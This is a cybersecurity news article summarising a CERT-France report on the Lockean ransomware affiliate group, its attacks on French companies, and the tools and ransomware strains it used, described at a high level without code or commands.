CERT-France: Lockean ransomware group behind attacks on French companies
Image: Florian Krumm
Catalin Cimpanu November 3, 2021

CERT-France: Lockean ransomware group behind attacks on French companies

CERT-France: Lockean ransomware group behind attacks on French companies

French cybersecurity officials have identified today for the first time a ransomware “affiliate group” that is responsible for a long list of attacks against French companies over the past two years.

Identified as Lockean, the group’s activities and modus operandi were detailed today in a comprehensive report published by France’s Computer Emergency Response Team (CERT-FR), a division of ANSSI, the country’s national cybersecurity agency.

According to French officials, the group has been active since June 2020 and “has a propensity to target French entities,” having been linked to attacks on at least seven French companies, such as transportation logistics firm Gefco, pharmaceutical groups Fareva and Pierre Fabre, and local newspaper Ouest-France.

Lockean operators used different ransomware strains

CERT-FR officials said the group would typically rent access to corporate networks that had been previously infected via Emotet phishing emails, where they would deploy the QakBot malware and later the CobaltStrike post-exploitation framework.

Lockean operators would then use tools like AdFindBITSAdmin, and BloodHound to move laterally inside a network in order to expand their access and control over a company’s systems.

The group would then use the RClone utility to copy sensitive files from the victim network and then deploy a file-encrypting ransomware strain.

Lockean-chain
Image: CERT-FR
Lockean-post-exploitation
Image: CERT-FR

According to CERT-FR officials, who investigated several of these intrusions, the Lockean group used different ransomware strains across the years, such as DoppelPaymer, Maze, Egregor, REvil (Sodinokibi), and ProLock.

Lockean-RaaS
Image: CERT-FR
Lockean-victims
Image: CERT-FR

Second ransomware affiliate group identified

Because Lockean used different ransomware strains, officials believe the group is what security researchers call a “ransomware affiliate,” a term that refers to criminal groups who sign up on Ransomware-as-a-Service (RaaS) platforms.

Through these platforms, affiliates gain access to ready-to-deploy ransomware strains, which they deploy on hacked networks, splitting successful ransom payments with the ransomware’s creators.

If victims refused to pay, data from these companies would be published on so-called “leak sites” operated by the RaaS platforms, where victims would often be listed in order to ramp up public pressure on the hacked companies.

Lockean is now the second ransomware affiliate group that has been publicly identified by law enforcement agencies after the FBI exposed the OnePercent group in August.

Catalin Cimpanu is a cybersecurity reporter for The Record. He previously worked at ZDNet and Bleeping Computer, where he became a well-known name in the industry for his constant scoops on new vulnerabilities, cyberattacks, and law enforcement actions against hackers.